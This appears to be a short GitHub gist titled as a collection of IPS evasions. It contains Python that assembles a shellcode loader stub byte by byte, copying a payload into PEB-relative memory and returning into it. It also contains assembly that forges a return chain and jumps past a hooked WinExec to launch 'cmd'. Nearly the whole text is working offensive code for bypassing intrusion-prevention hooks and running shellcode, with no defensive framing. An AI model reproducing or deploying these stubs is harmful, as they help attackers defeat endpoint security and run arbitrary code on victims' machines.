collection of various IPS evasions
offset = 0x1000 - len(scode) - 32 | |
tls_header = "\xE8\x00\x00\x00\x00" # CALL $+5 | |
tls_header += "\x5E" # POP ESI | |
tls_header += "\x83\xC6\x1B" # ADD ESI, 0x1b | |
tls_header += "\xB9" + struct.pack("<L", len(scode)) # MOV ECX, len(scode) | |
tls_header += "\x64\x8B\x3D\x30\x00\x00\x00" # MOV EDI,DWORD PTR FS:[30] | |
tls_header += "\x81\xC7" + struct.pack("<L", offset) # ADD EDI, offset | |
tls_header += "\x57" # PUSH EDI | |
tls_header += "\xFC" # CLD | |
tls_header += "\xF3\xA4" # REP MOVSB [EDI], [ESI] | |
tls_header += "\xC3" # RETN | |
""" | |
another: | |
pop ebx ; Real return address | |
push 0x00220000 ; Address of push ebp/call ebp after a call. | |
push ebx ; Final return to the real return address | |
push 0xbadc0de2 ; Junk to align stack for pop ebp | |
push [ebp+0x4] ; Pointer to 'cmd\0' | |
push 0x1010303D ; Address of pop ebp/ret(after a call) in CSAUSER | |
push ebp ; WinExec preable | |
mov ebp, esp | |
sub esp, 0x54 ; end WinExec preable | |
jmp eax ; jmp past WinExec hook. (eax = &WinExec + 0x6) | |
""" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment